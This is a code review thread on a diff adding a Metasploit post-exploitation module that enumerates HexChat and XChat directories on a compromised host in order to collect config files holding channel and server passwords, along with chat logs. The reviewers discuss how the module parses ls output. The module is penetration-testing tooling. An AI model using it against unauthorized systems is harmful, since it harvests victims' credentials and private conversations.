modules/post/multi/gather/enum_hexchat.rb

```diff
@@ -0,0 +1,277 @@
+          CONFIGS option can be used to collect information such as channel settings,
+          channel/server passwords, etc.  The CHATS option will simply download all the
+          .log files.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['sinn3r', 'h00die'],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Actions' =>
+          [
+            ['CONFIGS', { 'Description' => 'Collect config files' } ],
+            ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],
+            ['ALL', { 'Description' => 'Collect both the configs and chat logs' }]
+          ],
+        'DefaultAction' => 'ALL',
+        'References' =>
+          [
+            ['URL', 'https://hexchat.readthedocs.io/en/latest/settings.html']
+          ]
+      )
+    )
+    register_options([
+      OptBool.new('HEXCHAT', [false, 'Enumerate hexchat', true ]),
+      OptBool.new('XCHAT', [false, 'Enumerate xchat', false ])
+    ])
+  end
+
+  def whoami
+    cmd_exec('/usr/bin/whoami').chomp
+  end
+
+  def sep
+    if session.platform == 'windows'
+      return '\\'
+    else
+      return '/'
+    end
+  end
+
+  def get_paths(mode = 'HEXCHAT')
+    paths = []
+    if session.platform == 'windows'
+      appdata = get_env('APPDATA')
+      if mode == 'HEXCHAT'
+        paths << "#{appdata}\\HexChat\\"
+      elsif datastore['XCHAT']
+        paths << "#{appdata}\\X-Chat 2\\"
+      end
+    else
+      user = whoami
+      fail_with(Failure::Unknown, 'Unable to get username.') if user.blank?
+      vprint_status("Detcted username: #{user}")
+
+      if mode == 'HEXCHAT'
+        # https://hexchat.readthedocs.io/en/latest/settings.html
+        paths << "/home/#{user}/.config/hexchat/"
+      elsif mode == 'XCHAT'
+        paths << "/home/#{user}/.xchat2/"
+      end
+    end
+    paths
+  end
+
+  def list_logs(base, mode = 'HEXCHAT')
+    files = []
+    if mode == 'HEXCHAT'
+      # hexchat has a folder for each server
+      # inside each folder, like 'freenode'
+      # are files: sever.log, <server>.log, .log
+      folders = dir base
+      folders.each do |folder|
+        file = dir "#{base}#{sep}#{folder}"
+        file.each do |f|
+          if f.end_with? '.log'
+            files << "#{base}#{sep}#{folder}#{sep}#{f}"
+          end
+        end
+      end
+    elsif mode == 'XCHAT'
+      if session.platform == 'windows'
+        file = dir base
+        file.each do |f|
+          if f.end_with? '.log'
+            files << "#{base}#{sep}#{f}"
+          end
+        end
+
+      else
+        # the original methods written by @sinn3r
+        list = cmd_exec("ls -l #{base}*.log")
+        return [] if list =~ /No such file or directory/
+
+        # currently unsure what this is intending to do -h00die
+        files = list.scan(/\d+\x20\w{3}\x20\d+\x20\d{2}\:\d{2}\x20(.+)$/).flatten
```

Comment:
It lists the full path to each `.log` file identified from the `ls -l /etc/*.log` command above.

```
irb(main):001:0> list = `ls -l /etc/*.conf`
irb(main):002:0> files = list.scan(/\d+\x20\w{3}\x20\d+\x20\d{2}\:\d{2}\x20(.+)$/).flatten
irb(main):003:0> files
=> ["/etc/mke2fs.conf", "/etc/resolv.conf", "/etc/rygel.conf"]
irb(main):004:0> 
```

There is likely a much cleaner way to do this.

Reply:
`find(1)` is POSIX and can have portable invocation. That might be viable.

Something like `find /etc -name "*.log"`, perhaps with `-type f`.

Reply:
Surely there's a better way. None the less, I'm pretty sure we're discussing old dead code from the previous version of this module that h00die intends to remove. This `else` code branch is never executed.

Reply:
Gotcha.